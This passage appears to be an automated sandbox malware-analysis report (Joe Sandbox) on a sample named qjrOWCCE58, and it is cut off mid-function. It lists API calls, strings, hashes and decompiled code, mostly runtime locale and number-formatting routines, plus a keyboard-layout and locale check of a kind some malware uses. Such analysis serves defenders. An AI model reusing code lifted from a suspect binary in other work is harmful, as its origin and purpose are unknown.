0x00000000
0x00404a50
0x00404a50
0x00404a53
0x00404a56
0x00404a59
0x00404a59
0x00404a62
0x00000000
0x00404a62
0x00000000
0x00000000
0x00000000
0x004047c1
0x004047b1
0x00000000
0x004047cd
0x004047cd
0x004047ce
0x00000000
0x004046d0
0x00000000

APIs

GetKeyboardLayoutList.USER32(00000400,?,41D6575C), ref: 004046B8
GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 004046ED
__Init_thread_footer.LIBCMT ref: 004048C8

Part of subcall function 0040D6EE: EnterCriticalSection.KERNEL32(0043C4FC,?,?,004048CD,0043CE9C), ref: 0040D6F8
Part of subcall function 0040D6EE: LeaveCriticalSection.KERNEL32(0043C4FC,?,004048CD,0043CE9C), ref: 0040D72B
Part of subcall function 0040D6EE: RtlWakeAllConditionVariable.NTDLL ref: 0040D7A2

Strings

|[]], xrefs: 0040485D
|[]]GO@., xrefs: 004048A6
GO@., xrefs: 00404864

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterInfoInit_thread_footerKeyboardLayoutLeaveListLocaleVariableWake
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 4140350330-2383573185
Opcode ID: fa7f5bd0fdf052e6ff26ad5910ab4153a5093d74769cbe6313c6b9543c959cb9
Instruction ID: fd8d01e2e959d8a6783df84b8975096e6e822c6c7e542fae0e2e6615a0ad0cc2
Opcode Fuzzy Hash: fa7f5bd0fdf052e6ff26ad5910ab4153a5093d74769cbe6313c6b9543c959cb9
Instruction Fuzzy Hash: 44E102B1E002588BDB14CF68CC857DEB7B1EF89314F14427AE505B72C1DB79AA84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00824887 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 368COMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32(00000400,?,0043B054), ref: 0082491F
GetLocaleInfoA.KERNEL32(?,00000002,?,000001F4), ref: 00824954
__Init_thread_footer.LIBCMT ref: 00824B2F

Part of subcall function 0082D955: RtlEnterCriticalSection.NTDLL(0043C4FC), ref: 0082D95F
Part of subcall function 0082D955: RtlLeaveCriticalSection.NTDLL(0043C4FC), ref: 0082D992

Strings

GO@., xrefs: 00824ACB
|[]], xrefs: 00824AC4
|[]]GO@., xrefs: 00824B0D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInfoInit_thread_footerKeyboardLayoutLeaveListLocale
String ID: GO@.$|[]]$|[]]GO@.
API String ID: 2528885864-2383573185
Opcode ID: ac3040f63bda4e73b1973e8f95f771a6dc655d97a066e7abb36de72b2edb5a7a
Instruction ID: cbccab9cea311cad6403a182903c31c8fc016fc121e301f2ea82eeb68b5120f5
Opcode Fuzzy Hash: ac3040f63bda4e73b1973e8f95f771a6dc655d97a066e7abb36de72b2edb5a7a
Instruction Fuzzy Hash: D6E12271D002688BDB14CF68EC85BEEBBB1FF44314F145269E405E7281DB75AAC4CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042556F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E0042556F(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				void* _t121;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t128;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E0041B333(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E00425502(0x4308c0, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E00424E73(_t84, _t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E00424F93();
					} else {
						E00424EFA(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E00425502(0x4305b0, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E00424F93();
							} else {
								E00424EFA(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E004253BF(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E004239AD(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00411D34();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x43b054; // 0x41d6575c
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E0041B333(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E0041B333(_t97, _t114) + 0x34c);
								_t127 = E00425CAA(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E004221B2(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E00425DDC(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								_pop(_t121);
								_pop(_t128);
								_pop(_t88);
								return E0040D3AF(_t62, _t88, _v32 ^ _t130, _t114, _t121, _t128);
							} else {
								if(E0041CFF1(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E0041CFF1(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E0042A8F7(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E0041CFF1(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E0042A8F7(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E00411B28(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E004239AD(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00425574
0x00425575
0x00425577
0x0042557c
0x00425583
0x00425585
0x00425588
0x00425588
0x0042558b
0x0042558b
0x00425591
0x00425594
0x00425597
0x00425597
0x0042559a
0x0042559d
0x0042559f
0x004255a5
0x004255a7
0x004255ac
0x004255b6
0x004255bb
0x004255bd
0x004255c0
0x004255c0
0x004255c2
0x004255c6
0x0042560f
0x00000000
0x004255c8
0x004255cd
0x004255d6
0x004255cf
0x004255cf
0x004255cf
0x004255e1
0x004255eb
0x004255f0
0x004255f5
0x004255fb
0x004255ff
0x00425608
0x00425601
0x00425601
0x00425601
0x00425614
0x00425614
0x004255f5
0x004255e1
0x0042561a
0x00425756
0x00425756
0x00000000
0x00425620
0x00425620
0x00425629
0x0042563a
0x00425630
0x00425630
0x00425630
0x00425641
0x00425645
0x00000000
0x00425669
0x00425669
0x0042566e
0x00425670
0x00425670
0x00425672
0x00425677
0x00425751
0x00425753
0x00425758
0x0042575c
0x0042567d
0x0042567d
0x00425680
0x00425680
0x00425688
0x0042568b
0x0042568b
0x0042568e
0x0042568e
0x00425691
0x00425694
0x0042569e
0x004256a8
0x004256ad
0x004256b2
0x0042575d
0x0042575f
0x00425760
0x00425761
0x00425762
0x00425763
0x00425764
0x00425769
0x0042576d
0x00425775
0x0042577c
0x0042577f
0x00425780
0x00425784
0x00425785
0x0042578a
0x00425792
0x004257a1
0x004257ad
0x004257be
0x004257c6
0x004257e0
0x004257ed
0x004257f0
0x004257f3
0x004257f3
0x004257fd
0x004257c8
0x004257c8
0x004257ca
0x004257ca
0x00425803
0x00425804
0x00425807
0x0042580e
0x004256b8
0x004256c8
0x00000000
0x004256ce
0x004256d0
0x004256d0
0x004256dc
0x004256ea
0x00000000
0x004256ec
0x004256ec
0x004256ef
0x004256f5
0x004256f8
0x00425708
0x0042570d
0x0042571b
0x00000000
0x00000000
0x00000000
0x00000000
0x004256fa
0x004256fa
0x004256fd
0x00425703
0x00425706
0x0042571d
0x0042571d
0x00425729
0x00425749
0x00000000
0x0042572b
0x0042572b
0x00425735
0x0042573a
0x0042573f
0x00000000
0x00425741
0x00000000
0x00425741
0x0042573f
0x00000000
0x00000000
0x00000000
0x00425706
0x004256f8
0x004256ea
0x004256c8
0x004256b2
0x00425677
0x00425645

APIs

Part of subcall function 0041B333: GetLastError.KERNEL32(00401A78,?,00401A7C,00411E51,?,00401A78,761B5970,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B338
Part of subcall function 0041B333: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0041B5E3,00000000,761B5970,00000000,00000000,00401A78), ref: 0041B3D6

GetACP.KERNEL32(?,?,?,?,?,?,00419F33,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00425630
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00419F33,?,?,?,00000055,?,-00000050,?,?), ref: 0042565B
_wcschr.LIBVCRUNTIME ref: 004256EF
_wcschr.LIBVCRUNTIME ref: 004256FD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004257BE

Strings

utf8, xrefs: 0042572D

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 6e0978f98c709dbe72242619dcdd891e131b569b0c2e2cfa85a1772262fb7790
Instruction ID: e424abc0b8e8bdb89d4ce47199ee71509040d89b44fbd7d67015ffe1616a2794
Opcode Fuzzy Hash: 6e0978f98c709dbe72242619dcdd891e131b569b0c2e2cfa85a1772262fb7790
Instruction Fuzzy Hash: 92711931740A21AAD724AB35EC86BAB73A8EF84754F90402BF905D7281EB7CD941876D

Uniqueness

Uniqueness Score: -1.00%

Function 00427509 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00427509(signed int __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v25;
				signed char _v26;
				signed int _v27;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				signed int _v2432;
				signed int _v2436;
				signed int _v2448;
				signed int _v2480;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t836;
				intOrPtr _t846;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t858;
				signed int _t860;
				signed int _t864;
				signed int _t869;
				signed char _t870;
				signed char _t872;
				signed int _t885;
				signed int _t894;
				void* _t895;
				signed int _t896;
				signed int _t903;
				void* _t907;
				signed int _t908;
				intOrPtr _t914;
				void* _t915;
				signed int _t921;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t931;
				signed int _t933;
				signed int _t935;
				signed int _t936;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t945;
				signed int _t948;
				signed int _t951;
				signed int _t957;
				signed int _t958;
				signed int _t966;
				signed int _t969;
				signed int _t974;
				char* _t977;
				signed int _t981;
				signed int _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				char* _t996;
				signed char _t999;
				signed int _t1005;
				signed int _t1007;
				signed int _t1011;
				signed int _t1014;
				signed int _t1022;
				signed int _t1025;
				signed int _t1027;
				signed int _t1030;
				signed int _t1039;
				signed int _t1040;
				signed int _t1043;
				signed int _t1056;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int* _t1060;
				signed char _t1063;
				signed int* _t1066;
				signed int _t1069;
				signed int _t1071;
				signed int _t1075;
				signed int _t1078;
				signed int _t1086;
				signed int _t1089;
				signed int _t1092;
				signed int _t1095;
				signed int _t1104;
				intOrPtr _t1109;
				signed int _t1110;
				signed int _t1116;
				void* _t1124;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1130;
				signed int _t1138;
				signed int _t1142;
				signed int _t1144;
				signed int _t1149;
				void* _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1161;
				signed int _t1166;
				signed int _t1167;
				signed int _t1171;
				signed int _t1173;
				signed int _t1178;
				signed char _t1184;
				signed int _t1185;
				signed int _t1190;
				intOrPtr* _t1197;
				signed int _t1201;
				signed char _t1203;
				signed char _t1207;
				signed char _t1208;
				signed int _t1216;
				signed int _t1217;
				void* _t1219;
				signed int _t1222;
				signed int _t1224;
				signed int _t1225;
				signed int _t1226;
				signed int _t1229;
				signed int _t1233;
				signed int _t1234;
				signed int _t1235;
				signed int _t1237;
				signed int _t1238;
				signed int _t1239;
				signed int _t1241;
				signed int _t1242;
				signed int _t1243;
				signed int _t1244;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				unsigned int _t1252;
				unsigned int _t1256;
				unsigned int _t1259;
				signed int _t1260;
				signed int _t1263;
				signed int* _t1266;
				signed int _t1269;
				void* _t1271;
				unsigned int _t1272;
				signed int _t1273;
				signed int _t1276;
				signed int* _t1279;
				signed int _t1282;
				signed int _t1285;
				signed int _t1287;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1297;
				signed int _t1302;
				signed int _t1303;
				signed int _t1305;
				signed int _t1306;
				signed int _t1307;
				signed int _t1308;
				signed int _t1309;
				signed int _t1310;
				signed int _t1311;
				signed int _t1313;
				signed int _t1315;
				signed int _t1316;
				signed int _t1317;
				signed int _t1318;
				signed int _t1319;
				signed int _t1321;
				void* _t1322;
				signed int _t1323;
				signed int _t1325;
				signed int _t1330;
				intOrPtr _t1335;
				signed int _t1336;
				signed int _t1338;
				void* _t1339;
				void* _t1340;
				void* _t1343;
				unsigned int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				void* _t1364;
				void* _t1367;
				signed int _t1369;
				signed int _t1373;
				signed int _t1375;
				signed int _t1379;
				signed int _t1381;
				signed int _t1382;
				void* _t1383;
				void* _t1384;
				signed int _t1386;
				signed int _t1387;
				signed int _t1389;
				void* _t1392;
				signed int _t1394;
				signed int _t1395;
				signed int _t1397;
				signed int _t1398;
				signed int _t1400;
				signed int _t1407;
				signed int _t1408;
				void* _t1409;
				signed int* _t1410;
				signed int _t1411;
				signed int* _t1413;
				signed int _t1416;
				signed int _t1425;

				_t1285 = __edx;
				_t836 =  *0x43b054; // 0x41d6575c
				_v8 = _t836 ^ _t1407;
				_v1928 = _a16;
				_v1896 = _a20;
				E00429C7E(__eflags,  &_v1940);
				_t1184 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E00429CE6(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_t1381 = _a8;
				_t1335 = 0x20;
				_t1416 = _t1381;
				if(_t1416 > 0 || _t1416 >= 0 && _a4 >= 0) {
					_t846 = _t1335;
				} else {
					_t846 = 0x2d;
				}
				_t1197 = _v1928;
				 *_t1197 = _t846;
				 *((intOrPtr*)(_t1197 + 8)) = _v1896;
				E0041AF19( &_v1944, 0, 0);
				_t1410 = _t1409 + 0xc;
				if((_t1381 & 0x7ff00000) != 0) {
					L14:
					_t853 = E0041D804( &_a4);
					_pop(_t1200);
					__eflags = _t853;
					if(_t853 != 0) {
						_t1200 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1184;
					}
					_t854 = _t853 - 1;
					__eflags = _t854;
					if(_t854 == 0) {
						_t855 = E0041AF78(_v1896, _a24, "1#INF");
						_t1411 =  &(_t1410[3]);
						__eflags = _t855;
						if(_t855 != 0) {
							goto L311;
						} else {
							_t1184 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t894 = _t854 - 1;
						__eflags = _t894;
						if(_t894 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t896 = _t894 - 1;
							__eflags = _t896;
							if(_t896 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t896 == 1;
								if(_t896 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1381 & 0x7fffffff;
									_t1425 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1386 = _v1884;
									_v1916 = _a12 + 1;
									_t1216 = _t1386 >> 0x14;
									_t903 = _t1216 & 0x000007ff;
									__eflags = _t903;
									if(_t903 != 0) {
										_t903 = 0;
										_t1292 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1292 = 0;
										_v1876 = _t1184;
									}
									_t1387 = _t1386 & 0x000fffff;
									_v1912 = _v1888 + _t903;
									asm("adc esi, edx");
									_t1217 = _t1216 & 0x000007ff;
									_v1868 = _v1876 + _t1217;
									E00429D40(_t1217, _t1425);
									_push(_t1217);
									 *_t1410 = _t1425;
									_t907 = E00429E50(_t1217);
									_t1219 = _t1217;
									_t908 = L0042A730(_t907, _t1184, _t1219, _t1292);
									_v1904 = _t908;
									_t1343 = 0x20;
									__eflags = _t908 - 0x7fffffff;
									if(_t908 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t908 - 0x80000000;
										if(_t908 == 0x80000000) {
											goto L25;
										}
									}
									_t1293 = _v1868;
									__eflags = _t1387;
									_v468 = _v1912;
									_v464 = _t1387;
									_t1222 = (0 | _t1387 != 0x00000000) + 1;
									_v1892 = _t1222;
									_v472 = _t1222;
									__eflags = _t1293 - 0x433;
									if(_t1293 < 0x433) {
										__eflags = _t1293 - 0x35;
										if(_t1293 == 0x35) {
											L96:
											__eflags = _t1387;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t914 =  *((intOrPtr*)(_t1407 + 4 + (0 | _t1387 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t915 = 0;
												__eflags = 0;
											} else {
												_t915 = _t914 + 1;
											}
											__eflags = _t1343 - _t915 - _t1184;
											asm("sbb esi, esi");
											_t1389 =  ~_t1387 + _t1222;
											__eflags = _t1389 - 0x73;
											if(_t1389 <= 0x73) {
												_t1294 = _t1389 - 1;
												__eflags = _t1294 - 0xffffffff;
												if(_t1294 != 0xffffffff) {
													_t1364 = _t1294 - 1;
													while(1) {
														__eflags = _t1294 - _t1222;
														if(_t1294 >= _t1222) {
															_t1104 = 0;
															__eflags = 0;
														} else {
															_t1104 =  *(_t1407 + _t1294 * 4 - 0x1d0);
														}
														__eflags = _t1364 - _t1222;
														if(_t1364 >= _t1222) {
															_t1252 = 0;
															__eflags = 0;
														} else {
															_t1252 =  *(_t1407 + _t1294 * 4 - 0x1d4);
														}
														 *(_t1407 + _t1294 * 4 - 0x1d0) = _t1252 >> 0x0000001f | _t1104 + _t1104;
														_t1294 = _t1294 - 1;
														_t1364 = _t1364 - 1;
														__eflags = _t1294 - 0xffffffff;
														if(_t1294 == 0xffffffff) {
															goto L111;
														}
														_t1222 = _v472;
													}
												}
												L111:
												_v472 = _t1389;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												E00414A03( &_v468, 0x1cc,  &_v1396, 0);
												_t1410 =  &(_t1410[4]);
											}
											_t1346 = 0x434 >> 5;
											E0040F2F0(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1407 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1387;
											if(_t1387 != 0) {
												_t1322 = 0;
												__eflags = 0;
												while(1) {
													_t1109 =  *((intOrPtr*)(_t1407 + _t1322 - 0x570));
													__eflags = _t1109 -  *((intOrPtr*)(_t1407 + _t1322 - 0x1d0));
													if(_t1109 !=  *((intOrPtr*)(_t1407 + _t1322 - 0x1d0))) {
														goto L96;
													}
													_t1322 = _t1322 + 4;
													__eflags = _t1322 - 8;
													if(_t1322 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1110 = 0;
														} else {
															_t1110 = _t1109 + 1;
														}
														__eflags = _t1343 - _t1110 - 2;
														asm("sbb esi, esi");
														_t1400 =  ~_t1387 + _t1222;
														__eflags = _t1400 - 0x73;
														if(_t1400 <= 0x73) {
															_t1323 = _t1400 - 1;
															__eflags = _t1323 - 0xffffffff;
															if(_t1323 != 0xffffffff) {
																_t1367 = _t1323 - 1;
																while(1) {
																	__eflags = _t1323 - _t1222;
																	if(_t1323 >= _t1222) {
																		_t1116 = 0;
																	} else {
																		_t1116 =  *(_t1407 + _t1323 * 4 - 0x1d0);
																	}
																	__eflags = _t1367 - _t1222;
																	if(_t1367 >= _t1222) {
																		_t1256 = 0;
																	} else {
																		_t1256 =  *(_t1407 + _t1323 * 4 - 0x1d4);
																	}
																	 *(_t1407 + _t1323 * 4 - 0x1d0) = _t1256 >> 0x0000001e | _t1116 << 0x00000002;
																	_t1323 = _t1323 - 1;
																	_t1367 = _t1367 - 1;
																	__eflags = _t1323 - 0xffffffff;
																	if(_t1323 == 0xffffffff) {
																		goto L94;
																	}
																	_t1222 = _v472;
																}
															}
															L94:
															_v472 = _t1400;
														} else {
															_v1400 = 0;
															_v472 = 0;
															E00414A03( &_v468, 0x1cc,  &_v1396, 0);
															_t1410 =  &(_t1410[4]);
														}
														_t1346 = 0x435 >> 5;
														E0040F2F0(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1407 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t921 = _t1346 + 1;
										_t1392 = 0x1cc;
										_v1400 = _t921;
										_v936 = _t921;
										E00414A03( &_v932, 0x1cc,  &_v1396, _t921 << 2);
										_t1413 =  &(_t1410[7]);
										_t1184 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1387;
										if(_t1387 == 0) {
											L53:
											_t1259 = _t1293 - 0x432;
											_t1260 = _t1259 & 0x0000001f;
											_v1900 = _t1259 >> 5;
											_v1876 = _t1260;
											_v1920 = _t1343 - _t1260;
											_t1124 = E0042A6F0(_t1184, _t1343 - _t1260, 0);
											_t1325 = _v1892;
											_t1125 = _t1124 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1125;
											_t1126 =  !_t1125;
											_v1884 = _t1126;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1126 + 1;
											}
											_t1263 = _v1900;
											_t1392 = 0x1cc;
											_t1127 = _t1325 + _t1263;
											__eflags = _t1127 - 0x73;
											if(_t1127 <= 0x73) {
												__eflags = _t1343 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1130 =  ~_t1127 + _t1325 + _t1263;
												_v1908 = _t1130;
												__eflags = _t1130 - 0x73;
												if(_t1130 > 0x73) {
													goto L57;
												} else {
													_t1369 = _t1263 - 1;
													_t1138 = _t1130 - 1;
													_v1872 = _t1369;
													_v1868 = _t1138;
													__eflags = _t1138 - _t1369;
													if(_t1138 != _t1369) {
														_t1373 = _t1138 - _t1263;
														__eflags = _t1373;
														_t1266 =  &(( &_v472)[_t1373]);
														_v1892 = _t1266;
														while(1) {
															__eflags = _t1373 - _t1325;
															if(_t1373 >= _t1325) {
																_t1142 = 0;
																__eflags = 0;
															} else {
																_t1142 = _t1266[1];
															}
															_v1880 = _t1142;
															_t156 = _t1373 - 1; // -4
															__eflags = _t156 - _t1325;
															if(_t156 >= _t1325) {
																_t1144 = 0;
																__eflags = 0;
															} else {
																_t1144 =  *_t1266;
															}
															_t1269 = _v1868;
															 *(_t1407 + _t1269 * 4 - 0x1d0) = (_t1144 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1149 = _t1269 - 1;
															_t1266 = _v1892 - 4;
															_v1868 = _t1149;
															_t1373 = _t1373 - 1;
															_v1892 = _t1266;
															__eflags = _t1149 - _v1872;
															if(_t1149 == _v1872) {
																break;
															}
															_t1325 = _v472;
														}
														_t1263 = _v1900;
													}
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1263 << 2);
														_t1410 =  &(_t1410[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_v1400 = 0;
												_v472 = 0;
												E00414A03( &_v468, _t1392,  &_v1396, 0);
												_t1410 =  &(_t1410[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1271 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1407 + _t1271 - 0x570)) -  *((intOrPtr*)(_t1407 + _t1271 - 0x1d0));
												if( *((intOrPtr*)(_t1407 + _t1271 - 0x570)) !=  *((intOrPtr*)(_t1407 + _t1271 - 0x1d0))) {
													goto L53;
												}
												_t1271 = _t1271 + 4;
												__eflags = _t1271 - 8;
												if(_t1271 != 8) {
													continue;
												} else {
													_t1272 = _t1293 - 0x431;
													_t1273 = _t1272 & 0x0000001f;
													_v1880 = _t1272 >> 5;
													_v1900 = _t1273;
													_v1872 = _t1343 - _t1273;
													_t1155 = E0042A6F0(_t1184, _t1343 - _t1273, 0);
													_t1330 = _v1892;
													_t1156 = _t1155 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
